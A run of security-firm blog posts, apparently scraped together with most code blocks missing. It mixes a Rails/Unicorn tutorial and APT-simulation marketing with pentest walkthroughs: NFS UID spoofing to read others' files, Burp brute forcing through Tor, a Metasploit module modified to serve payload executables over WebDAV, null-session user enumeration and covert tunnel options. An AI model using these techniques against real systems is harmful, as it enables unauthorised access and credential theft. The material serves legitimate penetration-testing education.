The default mode of running Rails locally on your machine is, development mode. Also, any command you enter will be run in the context of the development mode. This means both Rake tasks and Rails commands alike and also holds true for the Rails console which, can be your best friend.

Now obviously, if you've done something custom like `export RAILS_ENV=production` this would be different. Additionally, explicitly casting the mode in which something like the Rails console runs (example: rails console production) will change the default behavior or mode, rather.

What does all this mean? Well, really it means that you want to develop in development mode and run a production application in production mode. Pretty simple huh?

Time to configure for Unicorn versus the default Webrick web server. If you are asking yourself "why", the answer is fairly straightforward. Unicorn is meant for production and handles a large amount of requests better and overall, is more configurable. For the purposes of this tutorial, we will use Unicorn for both development and production.

I want to demonstrate two ways of doing this. The first is by using a startup shell script. The other, for the purposes of an introduction to Rake tasks, will be to actually create a Rake task to start the application in lieu of a shell script.

Startup shell file:

Modify your Gemfile by uncommenting the line with the Unicorn gem. Also, while we are at it, let's uncomment the Bcrypt gem as well:

Run `bundle install`:

Make the startup script executable and fire it up:

The line `rvmsudo bundle exec unicorn $*` means...

rvmsudo - Allows you to run sudo commands while maintaining your RVM environment.

bundle exec = Directs bundler to execute the program which, automatically 'require'(s) all the gems in your Gemfile.

unicorn - Unicorn service.

$* - Any arguments passed to the script will be executed as part of the command inside of the script. Example: ./start.sh -p 4444 translates to - `rvmsudo bundle exec unicorn -p 4444` and would start the server on port 4444.

Alternatively, we can just easily package this up as a Rake task. A Rake task is a repeatable task that can be executed using the `rake` command. Nothing magical, it just harnesses Ruby goodness to convert your task definitions into an executable command.There is an excellent tutorial on Rake available via the Railscasts site. For our purposes, let's create a Unicorn rake file. Do this under /lib/tasks and use the `.rake` extension.Presumably, you may wish to have multiple tasks available to the Unicorn namespace. For instance, if you'd like to both start and stop the Unicorn service it would be beneficial to create a namespace titled "unicorn" with multiple tasks inside it. For the purposes of this tutorial, I will only cover building a start task as you can easily expand upon this. Also, since we are running the Unicorn service in an interactive mode, you can hit ctrl+c to stop it. I would like to note that having a start and stop task is very beneficial if you are running Unicorn detached (non-interactive), where the service runs in the background.Moving along, here is the task...Lines 1 & 9 - Begin and end the unicorn namespace definition.Line 3 - Describe the task (useful at the console).Line 4 - Define the task with the first argument "task" and any additional definitions (comma separated) are arguments. In this example, we except a port argument. Line 5 - We code some logic that says, port_command will equal either an empty string or "-p <port number>" and if a port number is not provided (nil) it will equal an empty string.Line 6 - This is a shell command that appends the result of port_command to `rvmsudo bundle exe unicorn`.Let's list our tasks and see if it is available:Success! Notice how the description and command format are auto-magically taken care of for you.'You can run this in one of two ways.`rake unicorn:start[4444]` (starts the Unicorn service on port 444) OR....`rake unicorn:start` (starts it on the default port, 8080)

To recap, we've shifted off of Webrick and over to Unicorn. Also, we've introduced the concept of a Rake task.Stay tuned for more parts in this series...~cktricky

In this series, I would like to demonstrate some of the basics of building a Ruby on Rails application and how MVC (Model-View-Controller) works. We will discuss some of the security pitfalls as well. Firstly, we need to make sure the tech is understood.

That being said, in this first part of the series, let's discuss some general Ruby "stuff" that makes life a little bit easier when dealing with day to day Ruby tasks.

RVM, RVM Gemsets, and an RVM resource file.

On the surface, Ruby Version Manager (RVM) allows you to host multiple versions of Ruby on your system and easily switch between them. If you go a little deeper, you'll see that RVM also provides the ability to host multiple "Gemsets" within each version of Ruby. This means you can create a Gemset per application and never worry about conflicting dependency versions.

One last thing to mention, you can do all of this seamlessly leveraging an .rvmrc file. When you change into the application's folder that holds an .rvmrc file, you will automatically switch Ruby versions and gemset based off the values specified in the rvm resource file (.rvmrc).

Firstly, lets choose our Ruby version as well as the name of our Gemset. I'm going to choose Ruby Enterprise Edition (already installed via $ rvm install ree) and name my Gemset after the application, "attackresearch". Shown later.

Now let's install Rails and it's required gems

Let's create the Rails application!

Now let's get the Gemfile and .rvmrc in order. I'm going to add the 'twitter-bootstrap-rails' gem and then perform a "bundle install". Whenever a change is made to your Gems, run 'bundle install' again to update the Gemfile.lock file.

The reason for twitter bootstrap will become clear later in these tutorials. Essentially, it allows us to easily create the visual aspects of the application.

Now for the .rvmrc file

Just to test that the .rvmrc file works, let's leave the directory then navigate back into it. Lastly, perform a 'gem list' to ensure our gems are available.

Part of it is the whole interactive shell-ness of powershell. so if you just type "powershell" once you drop to a cmd.exe you wont ever get the powershell prompt.

In a similar vain i've been unable to get any sort of combination of execute -f powershell.exe -a " blah blah" to work either. If anyone has the magic syntax i know lots of people that would be interested. (actually carlos perez hooked me up...answer below)

so, you can run powershell scripts via bat files and those execute just fine from within cmd.exe or from the "execute" command OR the encoded command [command].

Generates it based on old powersploit code here. Also a note to mention the 64 bit business I mentioned here still applies. If you are on x64 you need to call the PowerShell in SYSWOW64 to run 32bit payloads.

I was reading an article recently about how some of the sterilization requirements in factory farms actually encourage more damaging infections which then led me to think about antibiotic resistant strains of diseases popping up due to overuse of antibiotics. This finally led me to think about similarities in computer security.

Since I started officially working in security around 1996 a number of us have suffered from a Cassandra complex; providing warnings and gloomy predictions, which have usually come true, and being generally ignored. Now, over a decade later, it's too late to do some of what we should have done back then. Everything is owned. We have to retrofit now instead of building security in from the ground up. Its MUCH more expensive and difficult today than if we would have started then.

One of those predictions I was making back in the early 2000's was the following:

We should move away from standardized IT environments where everything is centralized and the same

We should stop trying so hard to stop the 80% of low sophistication attackers and focus on the 20% of attackers we really care about and who can really hurt us

Recently I have been doing a lot of incident response work and every organization I have dealt with is suffering from bullet number one. Everything centrally authenticates, everyone is running the same OS image, usernames are conventionalized and standardized, networks are flat and everything is hacked. I consistently see an attacker take over an entire network because once they had 1 machine, they had them all. Does a scientist need the same environment as a secretary? Should the sales department windows desktop be able to touch the production SQL database? Don't know, don't care, everyone gets the standard image. (And the spread of an attack is massively higher)That the industry has tried hard to solve the low hanging 80% attacks is obvious from looking at the "solutions" that are provided such as IDS, AV, Firewalls, failure logging, scan-exploit-report penetration tests etc. These have done a decent job of stopping scans, worms and mass malware for the most part and have failed miserably at stopping the remaining 20%. So why is this a problem? 80% is pretty good right? Well lets look at what the differences between the two types of attackers are:80%

Goals

Might steal your SSN or CC

Might use your system as a bot in a DDOS

Might redirect you to advertisements

Might strip your WoW character

Might deface your website / embarrass you

Techniques

Mass scans

1day exploits (often available patch)

Exploiting poor web coding

SQLinjection

Mass malware

20%

Goals

Will try to steal your intellectual property and us it for strategic advantage

Will gather intelligence against you to gain an edge in negotiations, legislation, bids, etc.

Will destroy the master boot record of all your desktops to financially damage your country

Will use you to attack your customers to achieve the above

Will steal your source code to find 0day, insert backdoors or sell it to competitors

Techniques

0day

Targeted spear phishing

Sophisticated post exploitation & persistence

Covert channels

Anti-analysis & evasion

Malicious insiders, supply chain, implanted hardware

Mass data exfiltration

Crypto key stealing

Trust relationship hijacking

So what we have effectively done is build an environment where all target hosts are uniformly the same, and ensure that the only "germs" who can get in are the ones who we can't detect, can't stop and can't deal with. Superbugs. Whats worse is the more we get compromised and hurt by the 20% the more money and resources we throw at trying to solve the 80% and the more we put our head in the sand about the attackers that really want to hurt us and are good at doing it. We've pushed the motivated attackers way from using the easy to deal with techniques towards the ones we can't solve very well and are very expensive.There are a few possible solutions:

Build active response capabilities (offense). This is messy and will cause a lot of problems but no one ever won a war with high walls and defense only. (Maginot line?)

Start throwing money and resources at the 20% problem. PCI is not going to do it. Compliance pen tests are not going to do it. Researching virtualizing every process, location aware document formats, degradation of service for anomalous connections, better intelligence, data sharing and correlation, in short making it increasingly expensive for the sophisticated attacker is what we should be looking at.

We have to stop popping antibiotics and figure out how to cut out the flesh eating bacteria.V.

Today I wanted to talk a bit more about APTSim. We all know by now that the bad guys always get in. Especially determined, well funded and well equipped attackers. We know roughly HOW they are getting in which is usually via a targeted Phish, SQLinjection, malicious URL, etc. Things that are hard to defend against because they depend on a human element or trust partnerships between organizations.

What we don't think about is the fact that our Incident Response and detection teams don't get exercised sufficiently (or ever) which makes them much less effective than they could be. We also don't think about modeling and understanding what real attack traffic looks like so we can tune our defenses against it. REAL traffic, not Nessus scans or CoreImpact exploits.

How can we know that our people and systems are actually able to detect the types of attacks we really care about if we don't know what each attack looks like in every data source we have. Is there a windows event log entry reflecting a change in service permissions? Can the timing pattern in the call home beacon be seen in net flow? What does an exfil file hidden in the recycle bin via user SID look like, and is it visible?

If you know all the malicious inputs to the system ahead of time, then you can determine all the data sources you have that show indicators that something has happened, rather than waiting until an attack happens to attempt to track it all back and hope for the best.

This subject is a bit more tricky so lets approach it first with an example. Using HERMES, we analyzed some samples and activity from a group of APT actors that we call "UPS". The typical UPS attack performed the following activities (this information was compiled from IR activity and shared data from other victims):

Generate a particularly timed beacon that communicates over HTTP

Drop the command line Chinese language version of winrar on the target

Replace sticky keys with cmd.exe for persistence and access via RDP

Turn on RDP if it's not already enabled

Index and archive all office documents, compress and encrypt them with RAR and a specific password and store them in the recycle bin

Enable the support_388945a0 account and add it to the local admin group

Exfiltrate the data encoded over port 443 (but not SSL)

Setup an insecure service for persistence / privilege escalation

That is a fairly comprehensive list of attacker activity and each action generates either specific network traffic, log entries, and files on the target. So what we do with APTSim is to take all the above information and create a piece of pseudo-malware that takes the same actions, except in a safe and controlled manner, and includes cleanup components so it can be removed when the exercise is complete.

Customers have different preferences as to how we take the next step but generally one of a few options is commonly used:

AR has VPN access to the customer network

AR has shipped a special box which the customer plugs into their network

AR conducts a physical penetration to launch the APTSim via a malicious USB key, custom developed Teensy, or other hardware implanted in customer equipment

AR generates a targeted phish mirroring the initial vector used by the original actors whether that's a malicious attachment or a URL, etc.

The customer executes the APTSim model themselves

The APTSim model then connects back to our command & control center, takes all the same actions as the real attacker, exfiltrates data and then the customer is notified of what activity took place. The notification is a short document contains log entry examples, PCAP examples, time and dates, ports used, in short everything that is needed to detect the activity as well as track it back post event.

If the attack simulation is not detected then AR will assist you in tuning your defenses whether that means new rules for your Cisco ASA's, custom ClamAV or Snort signatures, specialized Splunk apps, etc.

Rather than a barely useful once a year event, this process is ongoing, monthly or as new attacks are found and analyzed. When one of the organizations in your business sector is hit, within a very short period of time you know the crucial details of the attack, are tested to see if it could hit you as well, and finally are ready to defend before the attackers come for you. This is being proactive rather than reactive.

As a follow up to yesterday's post I would like to talk a bit more about HERMES and how it works.

INITIAL KNOWLEDGE - First there there is some form of information that comes in indicating a potential attack. This information usually has some trackable piece of information such as an email address, subject line, content, an md5 sum, etc. This information usually comes in one of the following methods:

Law enforcement notification

Incident Response/forensics post compromise information

A detection system picks up an attack (rare)

Specialized sourcing (AR gathers targeted attack tools, malware and other indicators using a variety of means including IR and direct sharing)

What's special about the above is that HERMES uses your standard build image rather than a generic XP VM, the way maliciousness is determined, and some of the memory work we do. Also the fact that the AV scans (unlike sites such as VirusTotal, Jotti, etc.) do not submit your sensitive samples to AV vendors is fairly unique.CORRELATION - Most organizations track incidents over time via a notebook, a wiki or most commonly a white board. HERMES allows you to identify relationships between attacks over time.

Incident Tracking

Analyst Notes

Actor/attribution Information

Relations between IOCs on different samples or cases

There are several ways in which HERMES is already benefiting our clients and options how it may benefit you:

HERMES can be delivered as an appliance to supplement or provide your reverse engineering and incident tracking operations

HERMES can be delivered as an ESXi implementation which can fit easily into your existing virtualized environment

Finally AR can provide organizations with HERMES targeted threat intel reporting or be operated by AR staff for you. Results can be provided as a XML feed, PDF, etc.

All of this information is fed into APTSim models to ensure that ongoing testing mirrors actual current targeted attack techniques and grows in sophistication over time in sync with the attackers. This information is also used to generate your IDS, AV, Splunk and other defensive signatures.Rather than focusing on the entire set of malware, for which there are millions upon millions of samples, HERMES focuses on a handful of sophisticated, targeted attack tools which are in use over the last 30 days or less. Most security tools are designed to deal with the 80% of attacks such as botnets, scans, mass malware, etc. But its the other 20% that you should care about because those are the ones that are intentionally (and successfully) damaging your business and that you have no defense against. This is something you can get your hands around with a tool like HERMES.On the next post I will talk a bit more about APTSim and how it works.As always, hit up info [at] attackresearch.com for more information.V.

We all know by now that most of today's defenses are designed to defend against auditors and penetration testers. We also know that penetration tests do not reflect what today's attackers actually do.

AR has decided to try to address this problem and change the way active defense security is currently done. This diagram roughly represents the current process.

At each stage of the current process there is a problem.

* Vendor signatures are broad and cover millions of threats, exploits and malware, causing tons of false positives and can only detect what is broadly "known".

* Penetration testing only occurs once or twice a year and is essentially patch verification at this point.

* Patching does nothing against 0days, configuration and design flaws or lateral attack with valid credentials.

* Real attacks are not being prevented or detected and few organizations have what's needed to address the problem once they have been compromised.

* Attackers change IPs constantly, its a solved problem for them.

* Orgs are buying every tool out there but have no qualified staff to implement and maintain them.

Here is AR's proposed process:

NOTE: We must give a nod here to Mandiant and their IOC concept, which is brilliant.In this process HERMES covers the first three points. HERMES performs ongoing intelligence collection of APT tools and activities. HERMES also conducts automated dynamic, static, network, and forensic analysis which in turn generates reports, indicators of compromise and defensive signatures. Unlike other products, HERMES can use your companies standard build image for dynamic testing, so you know exactly how the threat affects your environment rather than just a stock WinXP or Win7 image. HERMES replaces much of the expensive and time consuming reverse engineering process.AR analysts then add in notes concerning actors, victim industries, targeted data, etc. Finally HERMES back end big data system provides correlation so you can see and track connections between attacks, actors, malware and IP a year ago and attacks today. Once the defenses for these highly tactical, targeted IOCs have been put into place, APTSim comes into play. AR takes the tools and techniques used by APT actors and creates custom applications that do exactly what they do. We SIMULATE the exact APT attack, seen elsewhere against your colleagues and competitors, in your environment to assure you don't fall victim to it as well. These tools are run on your network, in an ongoing, subscription basis rather than a monolithic once a year event. AR provides your security and IT staff with frequent, small 1-3 page APTSim notifications of what was done, when, how, how it should have been detected and all the information necessary to detect it in the future if it wasn't. This is in stark contrast to the 40 page "here is what isn't patched" reports that traditional penetration tests generate.All if this means that your organization is in an ongoing circular process of constantly being notified, defended and tested against up to the minute APT attacks, rather than simply scanned and exploited for old memory corruption and XSS bugs.If you are an organization who has suffered losses from targeted attacks, are wrestling with staffing problems, and know your expensive defenses have proven inadequate, this is what you have been looking for.

We've mostly utilized the 3G out of band functionality, this allows us to more easily bridge that gap between physical and electronic attack. Either way its been great and definitely a value add for us.

:: All Pwn Plugs include aggressive reverse tunneling capabilities for persistent remote SSH access.:: All tunnels are encrypted via SSH and will maintain access wherever the plug has an Internet connection.:: The following covert tunneling options are available for traversing strict firewall rules & application-aware IPS:

SSH over any TCP port

SSH over HTTP requests (appears as standard HTTP traffic)

SSH over SSL (appears as HTTPS)

SSH over DNS queries (appears as DNS traffic)

SSH over ICMP (appears as outbound pings)

SSH over ICMP (appears as outbound pings)

SSH Egress Buster (top 10 common egress ports)

Out-of-band SSH over 3G/GSM cellular (Elite models)

yak yak, lets see some action shots!

First some shots of the web interface to set up the various tunnels (taken from the web site)

Its pretty straightforward and the documentation the pwnie express guys provide will get you up and running with whatever tunnel method you choose.

ok now action shots.

Pwn Plug hanging out in an empty cube hooked up to the network

With the 3G stick plugged in. sorry kinda blurry, couldnt go back and take another ;-/Final placement behind some boxes where it hung out for a few days.

We are going to be releasing a few blog posts on our thoughts on why we have to better communicate what works in actually securing something! This first post is on why we created our new class Offensive Techniques.With all the "APT" hype, 0 Day discussions, and endless numbers of intrusions we were having a hard time not screaming at the IT industry and saying pull your head out! Our good friend Dino Dai Zovi hit the nail on the head of why we created the Offensive Techniques class. He did this with a couple of tweets that read "Oh, I see what you have been doing all of this time. Solving problems that don't exist while ignoring the real ones in front of your face." Followed shortly by, “For example: defending against pen tests and security researchers instead of actual attacks and attackers. How's that working out for you?" Countless numbers of times we have either conducted a test or incident response for a business that was decimated by some type of targeted attack. The techniques used by either us or the attacker are usually not what is being taught in traditional penetration testing classes in the industry. The attack didn’t have nessus run against it or some type of vulnerability scanner. They usually didn’t even have nmap (they used a batch file with a for loop and ping/netcat for a quick port scanner). The attacks combined deep operating system level knowledge to circumvent mis-configurations, some good custom tools, and even metasploit! So why is it with the rise in increased spending with IT security that we see little progression in defending and detecting against attacks that are not pulled off by a trained pen tester? It is because we don't train or watch for these types of attacks, and we never have. They have been going on for decades not just the past 5 years or so. Take a look at the regulations on companies/organizations in relation to securing data. The regulations are just a checkbox game and the results of these regulations really don’t improve security that much, if at all. You can implement everything from NIST 800-53 and we will still get in and wreak havoc! Organizations and companies are bogged down with bureaucracy to even adapt as fast as they need to. We have to change the cultural mind of mid-senior level executives, politicians, and even some system administrators. Offensive Techniques is teaching how to really conduct offensive cyber operations, not auditor based attacks. Offensive Techniques is one of many Attack Research classes designed to help change how we go about actually providing organizations/companies with real threat based/vulnerability based results on how they are truly vulnerable. It teaches the fundamentals of how to conduct real attacks. We are debuting the class in October at Countermeasures 2012, but will be holding a class in the United States in November (more details to come on that). If you are interested in this or any other of our trainings reach out and send us an email at training@attackresearch.com

Debut of Offensive Techniques:We have completely overhauled our Tactical Exploitation class for Blackhat, and are now getting ready to debut a new course at Countermeasure 2012 (http://www.countermeasure2012.com/) titled Offensive Techniques (http://www.countermeasure2012.com/training-ot.html)

Offensive Techniques is designed to show students how to truly conduct offensive cyber operations on networks. In our current day of "APT" and targeted attacks, companies often don't understand how they are vulnerable to these types of attacks. Targeted attacks can be carried off by individuals as well as nation states and Offensive Techniques is designed to teach students how to really conduct these types of operations. We increasingly see many "pen-testing" shops disappoint a customer with a report about how many shells they got, but not how vulnerable their business is from someone actually coming after them in a targeted manner.The class is designed to work a student through compromising a fully operational enterprise Windows and Unix network with techniques perfected by Attack Research.We will be releasing more courses in the near future ranging from secure system administration to offensive and defensive classes. If you are interested in Offensive Techniques or other courses drop us a line at training@attackresearch.com

The module is in the trunk, you can read the post but in my experience newer version of Lotus Domino dont actually advertise that they are lotus domino in the banner, thus you need a way to identify these and once identified figure out current version so you can see if there are any exploits for it.

One of the other things Bill mentions is locating these vulnerable pages. He uses google dorks, which is useful as long as the site is indexed. While not in the trunk, awhile back i had a bunch of domino servers on a pentest. I ended up taking all the domino scanners i could find and combing those wordlists into one wordlist and writing a metasploit module to search for those URLs. The key was that we wanted to see which ones were open to the world and which ones require authentication (correct behavior) and any the forwarded you to somewhere else (probably because you are on 80 and the site requires 443).

The current module does not allow you to download exe's, in fact these are specifically blacklisted. This makes sense because that's not what the exploit is for. Anyway, someone asked me if it was possible to download a file (specifically a pre-generated exe) over WebDAV. I know an auxiliary module to be a webdav server has been a request for awhile, but it looked like the dll_hijacker module could accomplish it. I added a block of code to the process_get function to handle the exe and then removed .exe from the blacklist.

So if LOCALEXE is set to TRUE then serve up the local exe in the path/filename you specify, if not generate an executable based on the payload options (Yes, I realize AV will essentially make this part useless).

The below is a "show options" with nothing set, default is to generate a EXE payload, if you want to set your own local EXE you need to set LOCALEXE to TRUE.

msf exploit(webdav_file_server) > show options

Module options (exploit/windows/dev/webdav_file_server):

Name Current Setting Required Description ---- --------------- -------- ----------- BASENAME policy yes The base name for the listed files. EXTENSIONS txt yes The list of extensions to generate LOCALEXE false yes Use a local exe instead of generating one based on payload options LOCALFILE myexe.exe yes The filename to serve up LOCALROOT /tmp/ yes The local file path SHARENAME documents yes The name of the top-level share. SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The daemon port to listen on (do not change) SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH / yes The URI to use (do not change).

[*] Exploit running as background job.[*] Started reverse handler on 192.168.26.129:5555[*][*] Exploit links are now available at \\192.168.26.129\documents\[*][*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.26.129:80/[*] Server started.

Say you need to brute force something. Many devices (like Juniper SSL VPNs) will tell you to go to hell if you throw too many failed attempts at it to quickly. That sux.

I regularly use Intruder to do my brute forcing for me, specially since you can add timing options.

You can intercept your request, send to intruder, then add a payload marker for the username (and password if you want to do username/username)Setting the payload spotsSo if you just want to iterate through a list of usernames with the same pass, you just set the pass then go to payloads and add your userlist. Above, I'm doing username and username as the password and using the pitchfork attack type. ( I think Ken has gone over this in depth, so i'll stop explaining all that unless people ask for it).

Our list of usernamesOnce that is set up, you can play with timing options from the options tab. This will adjust number of threads and how long to wait in between requests.Timing optionsYou may also want to send everything through tor. Check the Burp main options tab.-CG

"Trace.axd is an Http Handler for .Net that can be used to view the trace details for an application. This file resides in the application’s root directory. A request to this file through a browser displays the trace log of the last n requests in time-order, where n is an integer determined by the value set by requestLimit=”[n]” in the application’s configuration file."http://www.ucertify.com/article/what-is-traceaxd.html

It is a separate file to store tracing messages. If you have pageOutput set to true, your webpage will acquire a large table at the bottom. That will list lots of information—the trace information. trace.axd allows you to see traces on a separate page, which is always named trace.axd.http://www.dotnetperls.com/trace

Open NFS mounts/shares are awesome. talk about sometimes finding "The Goods". More than once an organization has been backing up everyone's home directories to an NFS share with bad permissions. so checking to see whats shared and what you can access is important.

Low? currently an "info" with Nessus 5Anyway, you probably want to know about finding it. You have a few options.

To mount an NFS share use the following after first creating a directory on your local machine:[root@attacker~]#mount -t nfs 192.168.0.1:/export/home /tmp/badpermschange directories to /tmp/badperms and you should see the contents of /export/home on 192.168.0.1to abuse NFS you can check out the rest from http://www.vulnerabilityassessment.co.uk/nfs.htm it talks about tricking NFS to become users. I'm going to put it here in case it goes missing later:

"You ask now, how do you circumvent file permissions and the use of the sticky bit, this is done with a little prior planning and slight of hand to confuse the remote machine.

If we have a /export/home/dave directory that we have gone into, we will see a number of files belonging to dave, some or all of which you may be able to read. The one thing the system will give you is the owners UID on the remote system after issuing an ls -al command i.e.

-rwxr----- 517 wheel 898 daves_secret_doc

The permissions at the moment do not let you do anything with the file as you are not the owner (yet) and not a member of the group wheel.

Move away from the mount point and unmount the shareumount /local_dir

create a user called daveuseradd davepasswd dave

Edit /etc/passwd and change the UID to 517

Remount the share as local root

Go into daves directorycd dave

issue the commandsu dave

As you are local root you can do this and as you have an account called dave you will not need a password

Now the quirky stuff - As the UID for your local account dave matches the username and UID of the remote, the remote system now thinks your his dave, hey presto you can now do whatever you want with daves_secret_doc."

Valsmith and hdmoore gave their tactical exploitation talk at defcon 15 and talked about NFS (file services section of the slides) videowhite paper they also gave it at blackhat in a much longer format, unfortunately the video is broken into multiple 14 minute parts, so go Google for it (lazy)

The first post talks about executing shellcode and gives the calc.exe example. These examples work on x64 and x86. yay!The second post talks about doing something more than calc.exe...getting shell whooo hooooo

You can review the code but it only shows a x86/32bit shellcode. This will fail miserably on x64.

I was initially thought it would be an easy fix, just grab an x64 payload from MSF. Problem is there are no x64 http/https payloads...

CG was a sad panda.

This left me with two options:

Suck it up and use an existing x64 payload (like rev_tcp) or just pop calc.exe to prove how awesome i am during pentests

You will need to set the execution policy for v1.0 powershell, or possibly try a bypass technique.

I ended up adding this to Nicolas' code before it started doing its thing (line 24). It detects if its not x86 and just runs the shellcode with the x86 PowerShell. You'll have to set the execution policy for it first.

UPDATE - An easier way to do this can be found on our update post here

Android periodically updates it's SDK and somtimes when this happens, old methods for importing a Trusted CA, necessary to proxy SSL traffic, will fail and you must find a new solution. Technically speaking, it's not necessarily the import that is the problem, it's saving those changes between restarts of the emulator. If you've worked with the emulator you'll note that after importing a Trusted CA such as BurpSuite's certificate, the changes only take effect once you've rebooted the emulator. In other words, you actually have to restart the emulator, and without these steps, you'll lose your updated Trusted CA list.

Using Android SDK 19, the solution was to move a temporary file and rename it. Let's begin:

The reason this data persisted was because we moved the temporary copy (emultor-<random string>) from /tmp/android-<myname>/ and renamed it to system.img. Lastly, we placed the image file in the ~/.android/avd/test.avd/ directory.

Man I love mis-configured WebDAV, I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, its *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.

LOW?

IIS5 is awesome (not) because WebDAV is enabled by default but web root is not writable. Wait who still runs Windows 2000?! i know i know app cant be rewritten...accepted risk...blah blah...no one will ever use this to pwn my network...its ok if that DA admin script logs into it daily....

The "game" is finding the writable directory (if one exists) on the WebDAV enabled server. *Dirbusting and ruby FTW*

I find that its usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help, Nessus will actually tell you methods allowed per directory...still a challenge though.

Null sessions are old school. they used to be useful for pretty much every host in a domain. Unfortunately, I very rarely run into an environment where all workstations let you connect anonymously AND get data.

Where they can come in useful is

Against mis-configured servers

Against domain controllers to pull info

Low? actually a medium...

More than once I've had a PT where a master_browser was exposed to the Internet. We were able to connect to the server using rpcclient and enumerate users. After that we had a full list of the users in the domain to conduct external brute forcing attacks with.

If you like pretty pictures, it kinda looks like this, there are command line utilities as well...

Cain uses null sessions by default to try to pull information. On modern systems this will fail.

But domain controllers/master_browsers do allow this, so if you find yourself in the position to be able to speak with one you can a list of users for the domain

You can then take that list of users and do brute force attacks against various services. I rarely don't find at least one username/username in an environment.

"Index of" can be your friend and the same with "web mirroring". Unfortunately, and also to the point of the talk/series you have to go look at this crap. It's *usually* not important. stuff like the /icons/ in Apache.

But every now and then pure gold will show up. so you have to go look at it.

LOW?

So some examples of browsable directories that were not /icons/ :-)yeah yeah but real world?! so for story time, we were doing a PT, the site had SQL Injection so were able to pull down lots of data but the sensitive stuff was *encrypted* so we were kinda stuck. Poking around further we found a directory with indexing enabled. what was there? database backup and a site back up with the decryptMe PHP function along with the current encrypt key :-) All from a "low" vulnerability.

Sometimes even though the deployer functionality is password protected the sever-status may not be.

/web-console/status?full=true

/manager/status/all

LOW?This can be useful to find:

Lists of applications

Recent URL's accessed

sometimes with sessionids

Find hidden services/apps

Enabled servlets

owned stuff :-)

Finding 0wned stuff is always fun let's seeLooking at the list of applications list one that doesnt look normal (zecmd)Following that down leads us to zecmd.jsp that is a jsp shellIf you are interested in zecmd.jsp and jboss worm it comes from --> this is a good write up as well as this OWASP preso https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdfthoughts?-CG

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [1] Exposed Services and Admin Interfaces

Exposed Services:

An example of exposed services and making sure you check for default and common passwords. so first example is a VNC server with no password. This gives us a HIGH severity finding

The following is a VNC server with a password of "password"see the problem? Same thing goes for SSH, Telnet, FTP, etc. Don't forget about databases as well, MS SQL, MySQL, Oracle, Postgres listening out to the Internet at large.

Admin Interfaces:

Admin interfaces can be gold. the problem is 1) you have to find them on the random ass port they are running on and 2) you have to get eyes on them. this can be a hassle/problem/hard to do.

So to bring the "low" to it. some random HTTP server gets you this in Nessus

Now, to be fair this could be totally accurate, but the point is you need to look at what is being served on this HTTP server, could be something could be nothing, no way to know unless you look. Finding useful HTTP pages on all the random ports can be challenging.

Here is a possible methodology for doing it:

Nmap your range

Import your nmap results into metasploit

Use the db_ searches to pull out a list of hosts & ports

With the magic of scripting languages make that list into an html page(s)

Kinda goes like this:after you have imported your nmap results, uses the services option.If its populated you'll get a list or results like the belowOutput that stuff to a CSV

msf > services -o /tmp/demo.csv

Take that CSV and run some ruby on it

The above code will output an html file that you can open with linkylinky will open each link in a new tab allowing you a way to get eyes on each of those random HTTP(S) services.You can now start intelligently trying default passwords or viewing exposed content.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [0] Intro/The point of the talk (sorry no pics of msf or courier new font in this one):

I had several points (I think...maybe all the same point...whatever)

1. We tend to have an over reliance on vulnerability scanners to tell us everything that is vulnerable. To be honest I have been guilty of this myself. Most of us probably have a for a variety of reasons, time, experience, level of effort required/paid for, etc. This over reliance on scanners has lead to a "no highs" == "secure environment". Most of us know this is not *always* the case and the point of the talk was to show some examples were medium and low vulnerabilities have led to a further exploitation or impact that I would consider "high" or above. Whether you call them chained exploits, magic, or the natural evolution of taking multiple smaller vulnerabilities and turning them into a significant exploit or opportunity its becoming more normal/common to have to go this route.

2. Given the "no highs" == "secure environment" mentality some clients have been conditioned that anything that is not a high is not exploitable and therefore not a priority for fixing (sometimes ever). This of course is not the outcome most people would recommend. Nevertheless some people take that approach.

3. How many IDS/IPS signatures exist for low and medium vulns and how often do we ignore/disable those? Feedback welcome here.

4. Clients should pay attention to low/medium vulns as much as they do high+ vulns and in turn pentesters/VA people/security teams should also pay attention to low/medium vulns. Does that mean ever SSLv2 enabled should be full out emergency? Hell no, but *someone* needs to be able to vet that those low/medium findings cant be turned into something more.

5. Keep in a human in the mix. Tools/scanner are great for automating tasks but I don't think we are there yet with the technology of taking multiple less severe vulnerabilities and turning them into something significant. Bottom line, the scanner wont find all your ownable stuff, you need a person(s) to do this.

I'll be giving my ColdFusion for Pentesters talk at SOURCE Boston next week.

Here is the info from the abstract:

"ColdFusion is one of those technologies where organizations are either ColdFusion shops or they won't touch it on a bet. Similarly, I find that pentesters have either been exposed to it and have a few tricks to attack it or not. Aside from common web application issues, ColdFusion can also be attacked on the network level and many times used to obtain remote access on the host. This talk will cover what is ColdFusion, common ColdFusion issues, finding useful ColdFusion URLs, identifying specific ColdFusion version and components, and verifying if common vulnerabilities are present in the ColdFusion server you are targeting. If access to the ColdFusion administrative interface can be obtained, you can perform post exploitation activities that will typically yield you remote access to the operating system supporting the ColdFusion install."

Like the other talks, i'll do the what it is, why you care (?), and some ways to go after it. Hopefully useful/interesting.

In July I published an article on Abusing Password Resets. Some Ruby code was provided and it no longer works very well. Gmail has a limitation on POP3 message retrieval, long story short, you can only get around 250 emails. This is pretty annoying when you want to pull down thousands of password reset emails to analyze the plain-text passwords for entropy. So the solution is to use IMAP. Here is that code:Breakdown:

Lines 1-3 - Start the script in Ruby, require the necessary libs

Lines 6, 8 - Name the class, instantiate a placeholder for file (could have been done with an instance variable as well).

Lines 10-11 - Method invoked (def initialize) when the class is started, self.lfile is the location of the file we will store our emails in.

Line 14 - Instantiate a connection string to Gmail's IMAP server, name it "imap".

Line 16-17 - Provide creds and invoke the check_for_emails method

Lines 24, 33 - define the check_emails_method, take the imap object as input, and close "end" the method.

